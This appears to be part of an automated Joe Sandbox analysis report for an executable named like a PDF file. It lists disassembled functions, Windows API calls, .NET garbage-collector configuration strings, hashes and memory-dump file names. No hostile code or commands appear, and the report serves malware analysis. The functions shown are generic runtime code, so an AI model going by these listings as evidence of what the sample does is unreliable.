API String ID: 2131581837-0
Opcode ID: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
Instruction ID: 24dbf40f1dc4a0a12ae19462d3abf2a46a7ab650af1486d9e6c28a3f947eedc9
Opcode Fuzzy Hash: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
Instruction Fuzzy Hash: E3114C33A2878282DA64AF25A4051AAB760FB457B0F948339E6FE177D6DF38D0428710

Function 00007FF773C556A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF773C556F1

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction ID: 26572f1866f263cc21757a556455b5e20c5d2276ba8dc5ee3d6a0e07c53cfe80
Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
Instruction Fuzzy Hash: 4FF08217F3C64242E6807B61B9C227AA3519F497A0FA85131E95D177D7CE3CE0918750

Function 00007FF773C61770 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FF773C6177A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction ID: 910dc24e0746e8fb5e94211e0e279a48a151d3111ef53259c090ce77895a9721
Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
Instruction Fuzzy Hash: BDB01240F3A441C2E34437A37C4230801153B56B42FC04034DA08B1250CE1C81A50B10

Non-executed Functions

Function 00007FF773C61A00 Relevance: 118.0, Strings: 94, Instructions: 546COMMON

Download Yara Rule

Strings

GCHighMemPercent, xrefs: 00007FF773C61DCE
ConfigLogEnabled, xrefs: 00007FF773C61B36
BGCFLki, xrefs: 00007FF773C62051
GCTotalPhysicalMemory, xrefs: 00007FF773C61E9D
ForceCompact, xrefs: 00007FF773C61A89
ServerGC, xrefs: 00007FF773C61A2A
BGCMemGoalSlack, xrefs: 00007FF773C61FD9
LOHCompactionMode, xrefs: 00007FF773C61BE0
BGCFLff, xrefs: 00007FF773C6208D
System.GC.DynamicAdaptationMode, xrefs: 00007FF773C6236C
GCGen1MaxBudget, xrefs: 00007FF773C61E1D
System.GC.HeapAffinitizeRanges, xrefs: 00007FF773C61D72, 00007FF773C61D93
BGCSpin, xrefs: 00007FF773C61C3A
BGCFLSweepGoalLOH, xrefs: 00007FF773C62015
System.GC.NoAffinitize, xrefs: 00007FF773C61AF0
LatencyMode, xrefs: 00007FF773C61CD8
GCName, xrefs: 00007FF773C6230B, 00007FF773C6232E
LogFile, xrefs: 00007FF773C61F2B
GCHeapHardLimitLOHPercent, xrefs: 00007FF773C62271
System.GC.HeapHardLimitPOH, xrefs: 00007FF773C6221B
GCNumaAware, xrefs: 00007FF773C61B57
BGCFLTuningEnabled, xrefs: 00007FF773C61F9D
GCHeapHardLimit, xrefs: 00007FF773C61E68
BGCG2RatioStep, xrefs: 00007FF773C621B9
LatencyLevel, xrefs: 00007FF773C61CF6
BGCMLkp, xrefs: 00007FF773C620F2
GCHeapHardLimitSOH, xrefs: 00007FF773C621E6
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF773C6223D
GCSpinCountUnit, xrefs: 00007FF773C6234E
System.GC.Name, xrefs: 00007FF773C62304, 00007FF773C6231C
GCHeapHardLimitPOHPercent, xrefs: 00007FF773C62290
GCHeapAffinitizeMask, xrefs: 00007FF773C61D5F
GCLargePages, xrefs: 00007FF773C61BB2
System.GC.ConserveMemory, xrefs: 00007FF773C622C1
HeapVerifyLevel, xrefs: 00007FF773C61BC2
System.GC.RetainVM, xrefs: 00007FF773C61AAA
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF773C62281
GCConserveMem, xrefs: 00007FF773C622D0
GCEnabledInstructionSets, xrefs: 00007FF773C622A3
System.GC.HeapHardLimitSOH, xrefs: 00007FF773C621D7
GCLogFile, xrefs: 00007FF773C61F1A
GCHeapHardLimitLOH, xrefs: 00007FF773C62208
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF773C62267
BGCFLEnableTBH, xrefs: 00007FF773C6217D
SegmentSize, xrefs: 00007FF773C61CBA
BGCMemGoal, xrefs: 00007FF773C61FBB
System.GC.MaxHeapCount, xrefs: 00007FF773C61C7A
BGCFLSmoothFactor, xrefs: 00007FF773C620AB
BGCFLGradualD, xrefs: 00007FF773C620C9
HeapCount, xrefs: 00007FF773C61C67
System.GC.HeapHardLimitLOH, xrefs: 00007FF773C621F9
CompactRatio, xrefs: 00007FF773C61D32
System.GC.HeapHardLimit, xrefs: 00007FF773C61E59
GCRegionSize, xrefs: 00007FF773C61ED9
GCProvModeStress, xrefs: 00007FF773C61DE1
GCGen0MaxBudget, xrefs: 00007FF773C61DFF
BGCFLEnableKd, xrefs: 00007FF773C62141
BGCFLkd, xrefs: 00007FF773C6206F
GCHeapHardLimitPercent, xrefs: 00007FF773C61E8A
Gen0Size, xrefs: 00007FF773C61C9C
NoAffinitize, xrefs: 00007FF773C61B02
GCHeapAffinitizeRanges, xrefs: 00007FF773C61D7E, 00007FF773C61D9F
LogEnabled, xrefs: 00007FF773C61B15
GCHeapHardLimitSOHPercent, xrefs: 00007FF773C6224C
System.GC.CpuGroup, xrefs: 00007FF773C61B78
BGCMLki, xrefs: 00007FF773C62105
System.GC.HighMemoryPercent, xrefs: 00007FF773C61DBF
System.GC.HeapCount, xrefs: 00007FF773C61C58
GCConfigLogFile, xrefs: 00007FF773C61F5E
BGCFLkp, xrefs: 00007FF773C62033
MaxHeapCount, xrefs: 00007FF773C61C89
RetainVM, xrefs: 00007FF773C61ABC
BGCFLEnableFF, xrefs: 00007FF773C6219B, 00007FF773C622E3
ConservativeGC, xrefs: 00007FF773C61A68
GCLowSkipRatio, xrefs: 00007FF773C61E3B
BreakOnOOM, xrefs: 00007FF773C61ACF
GCEnableSpecialRegions, xrefs: 00007FF773C61EF7
LogFileSize, xrefs: 00007FF773C61D14
ConfigLogFile, xrefs: 00007FF773C61F6F
System.GC.HeapHardLimitPercent, xrefs: 00007FF773C61E7B
BGCSpinCount, xrefs: 00007FF773C61C1C
BGCFLEnableKi, xrefs: 00007FF773C62123
System.GC.Concurrent, xrefs: 00007FF773C61A43
GCDynamicAdaptationMode, xrefs: 00007FF773C6237B
BGCFLEnableSmooth, xrefs: 00007FF773C6215F
GCRegionRange, xrefs: 00007FF773C61EBB
GCHeapHardLimitPOH, xrefs: 00007FF773C6222A
System.GC.LargePages, xrefs: 00007FF773C61BA8
LOHThreshold, xrefs: 00007FF773C61BFE
ConcurrentGC, xrefs: 00007FF773C61A55
System.GC.HeapAffinitizeMask, xrefs: 00007FF773C61D50
GCCpuGroup, xrefs: 00007FF773C61B8A
BGCFLSweepGoal, xrefs: 00007FF773C61FF7
System.GC.Server, xrefs: 00007FF773C61A1B

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-799405152
Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction ID: b471939b2d2564c068eef818ef170bc6363c1fdf6240ad685056b24362def631
Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
Instruction Fuzzy Hash: 3E426F22A3CA9751EBA0AB95F850AA9B3A5FF467C8FC11133D98C17B24DF3CD2158714

Function 00007FF773C62750 Relevance: 109.2, Strings: 87, Instructions: 472COMMON

Download Yara Rule

Strings

GCHighMemPercent, xrefs: 00007FF773C62BA6
BGCFLki, xrefs: 00007FF773C62E67
GCTotalPhysicalMemory, xrefs: 00007FF773C62CCD
BGCMemGoalSlack, xrefs: 00007FF773C62DC3
BGCFLff, xrefs: 00007FF773C62EB9
System.GC.DynamicAdaptationMode, xrefs: 00007FF773C63239
GCWriteBarrier, xrefs: 00007FF773C631E7
GCGen1MaxBudget, xrefs: 00007FF773C62C1F
GCConserveMemory, xrefs: 00007FF773C631C0
GCBreakOnOOM, xrefs: 00007FF773C6282C
BGCSpin, xrefs: 00007FF773C629F6
BGCFLSweepGoalLOH, xrefs: 00007FF773C62E15
System.GC.NoAffinitize, xrefs: 00007FF773C62854
GCConfigLogEnabled, xrefs: 00007FF773C628A9
GCHeapHardLimitLOHPercent, xrefs: 00007FF773C6313B
System.GC.HeapHardLimitPOH, xrefs: 00007FF773C630DF
GCNumaAware, xrefs: 00007FF773C628D1
BGCFLTuningEnabled, xrefs: 00007FF773C62D71
GCHeapCount, xrefs: 00007FF773C62A26
GCHeapHardLimit, xrefs: 00007FF773C62C78
BGCG2RatioStep, xrefs: 00007FF773C63053
GCLogEnabled, xrefs: 00007FF773C62881
BGCMLkp, xrefs: 00007FF773C62F34
GCHeapHardLimitSOH, xrefs: 00007FF773C63083
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF773C63106
GCSpinCountUnit, xrefs: 00007FF773C63210
gcConcurrent, xrefs: 00007FF773C62789
GCCompactRatio, xrefs: 00007FF773C62B48
HeapVerify, xrefs: 00007FF773C62953
GCHeapHardLimitPOHPercent, xrefs: 00007FF773C63169
GCHeapAffinitizeMask, xrefs: 00007FF773C62B78
GCLargePages, xrefs: 00007FF773C6292D
System.GC.ConserveMemory, xrefs: 00007FF773C631B9
System.GC.RetainVM, xrefs: 00007FF773C627FF
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF773C63162
GCEnabledInstructionSets, xrefs: 00007FF773C63190
GCLOHCompact, xrefs: 00007FF773C6297B
System.GC.HeapHardLimitSOH, xrefs: 00007FF773C6307C
GCLOHThreshold, xrefs: 00007FF773C629A4
GCHeapHardLimitLOH, xrefs: 00007FF773C630B1
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF773C63134
BGCFLEnableTBH, xrefs: 00007FF773C63001
BGCMemGoal, xrefs: 00007FF773C62D9A
System.GC.MaxHeapCount, xrefs: 00007FF773C62A4D
BGCFLSmoothFactor, xrefs: 00007FF773C62EEB
BGCFLGradualD, xrefs: 00007FF773C62F0B
GCRetainVM, xrefs: 00007FF773C62806
System.GC.HeapHardLimitLOH, xrefs: 00007FF773C630AA
System.GC.HeapHardLimit, xrefs: 00007FF773C62C71
GCRegionSize, xrefs: 00007FF773C62D28
GCgen0size, xrefs: 00007FF773C62A7B
GCProvModeStress, xrefs: 00007FF773C62BCD
gcServer, xrefs: 00007FF773C62762
GCGen0MaxBudget, xrefs: 00007FF773C62BF6
BGCFLEnableKd, xrefs: 00007FF773C62FAF
BGCFLkd, xrefs: 00007FF773C62E90
GCHeapHardLimitPercent, xrefs: 00007FF773C62CA6
GCNoAffinitize, xrefs: 00007FF773C6285B
GCHeapHardLimitSOHPercent, xrefs: 00007FF773C6310D
System.GC.CpuGroup, xrefs: 00007FF773C628F9
BGCMLki, xrefs: 00007FF773C62F5D
System.GC.HighMemoryPercent, xrefs: 00007FF773C62B9F
System.GC.HeapCount, xrefs: 00007FF773C62A1F
GCSegmentSize, xrefs: 00007FF773C62AA4
GCMaxHeapCount, xrefs: 00007FF773C62A54
BGCFLkp, xrefs: 00007FF773C62E3E
BGCFLEnableFF, xrefs: 00007FF773C6302A
gcForceCompact, xrefs: 00007FF773C627D7
GCLowSkipRatio, xrefs: 00007FF773C62C48
GCEnableSpecialRegions, xrefs: 00007FF773C62D48
GCLogFileSize, xrefs: 00007FF773C62B28
GCLatencyLevel, xrefs: 00007FF773C62AF6
System.GC.HeapHardLimitPercent, xrefs: 00007FF773C62C9F
BGCSpinCount, xrefs: 00007FF773C629CD
BGCFLEnableKi, xrefs: 00007FF773C62F86
System.GC.Concurrent, xrefs: 00007FF773C62782
GCLatencyMode, xrefs: 00007FF773C62ACD
GCDynamicAdaptationMode, xrefs: 00007FF773C63240
BGCFLEnableSmooth, xrefs: 00007FF773C62FD8
GCRegionRange, xrefs: 00007FF773C62CF6
GCHeapHardLimitPOH, xrefs: 00007FF773C630E6
System.GC.LargePages, xrefs: 00007FF773C62926
gcConservative, xrefs: 00007FF773C627AF
System.GC.HeapAffinitizeMask, xrefs: 00007FF773C62B71
GCCpuGroup, xrefs: 00007FF773C62900
BGCFLSweepGoal, xrefs: 00007FF773C62DEC
System.GC.Server, xrefs: 00007FF773C6275B

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: strcmp
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 1004003707-1294421646
Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction ID: b724cac0d2a61f11c0d89676ca695bb8820a90b03a69d29cc0e1bbe33fab090a
Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
Instruction Fuzzy Hash: 1962B922E3DA87A4FA82FBE5AC400B2B761AF55794BC44177C44D67262DF3CA169C370

Function 00007FF773C91200 Relevance: 21.8, APIs: 14, Instructions: 792COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF773C91580
DebugBreak.KERNEL32 ref: 00007FF773C91598
DebugBreak.KERNEL32 ref: 00007FF773C91647
DebugBreak.KERNEL32 ref: 00007FF773C91685
DebugBreak.KERNEL32 ref: 00007FF773C916D5
DebugBreak.KERNEL32 ref: 00007FF773C91726
DebugBreak.KERNEL32 ref: 00007FF773C9178B
DebugBreak.KERNEL32 ref: 00007FF773C917E1
DebugBreak.KERNEL32 ref: 00007FF773C91A18
DebugBreak.KERNEL32 ref: 00007FF773C91B09
DebugBreak.KERNEL32 ref: 00007FF773C91B8B
DebugBreak.KERNEL32 ref: 00007FF773C91BC4
DebugBreak.KERNEL32 ref: 00007FF773C91BF8
DebugBreak.KERNEL32 ref: 00007FF773C91CD7

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction ID: 00f634b8c9d35eb332fbc7633d80ea3948c1067d6dfda85401246ea3405deca9
Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
Instruction Fuzzy Hash: ED72AE23A396828AEA91AB1590423B9F7A0FF45B94F9A4135CE5D277D5EF3CE450C320

Function 00007FF773C61830 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF773C6186C
GetCurrentProcess.KERNEL32 ref: 00007FF773C61894
OpenProcessToken.ADVAPI32 ref: 00007FF773C618A7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF773C618CC
GetLastError.KERNEL32 ref: 00007FF773C618D4
CloseHandle.KERNEL32 ref: 00007FF773C618E1
GetLargePageMinimum.KERNEL32 ref: 00007FF773C618F6
VirtualAlloc.KERNEL32 ref: 00007FF773C61927
GetCurrentProcess.KERNEL32 ref: 00007FF773C61933
VirtualAllocExNuma.KERNEL32 ref: 00007FF773C61953

Strings

SeLockMemoryPrivilege, xrefs: 00007FF773C61865

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction ID: 64783e75d21b47741055ecdbc9b43f0d5f00a11eed71f123709bcb71ff871f58
Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
Instruction Fuzzy Hash: FF318773A3CA42C6F7A0ABA1F404366A7A1EB447DDF844035DA8E17694DF3CD4488710

Function 00007FF773C6EFE0 Relevance: 13.4, APIs: 5, Strings: 2, Instructions: 1181threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF773C6F687
SwitchToThread.KERNEL32 ref: 00007FF773C6F7F0
SwitchToThread.KERNEL32 ref: 00007FF773C6F7F9
SwitchToThread.KERNEL32 ref: 00007FF773C6F823

Part of subcall function 00007FF773C61630: QueryPerformanceCounter.KERNEL32 ref: 00007FF773C61639

DebugBreak.KERNEL32 ref: 00007FF773C6F95E

Strings

GCHeap::Promote: Promote GC Root *%p = %p MT = %pT, xrefs: 00007FF773C6FB15
Concurrent GC: Restarting EE, xrefs: 00007FF773C6F66A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: SwitchThread$BreakCounterDebugPerformanceQuery
String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
API String ID: 30421299-2108734148
Opcode ID: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
Instruction ID: 7b7b1c923bb21aeacb390f34d01ff8ab11cdb42adfabe8f4b479833f70103d34
Opcode Fuzzy Hash: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
Instruction Fuzzy Hash: 90C2A023A3E74681FAD1AB64E8503B4B7A4AF45B88F944236DD4D633E5DF3DE4518320

Function 00007FF773C71520 Relevance: 13.1, APIs: 8, Instructions: 1052threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF773C72074
DebugBreak.KERNEL32 ref: 00007FF773C72087
SwitchToThread.KERNEL32 ref: 00007FF773C72238
SwitchToThread.KERNEL32 ref: 00007FF773C72262
SwitchToThread.KERNEL32 ref: 00007FF773C722EE
SwitchToThread.KERNEL32 ref: 00007FF773C7248C
SwitchToThread.KERNEL32 ref: 00007FF773C72495
SwitchToThread.KERNEL32 ref: 00007FF773C724BF

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

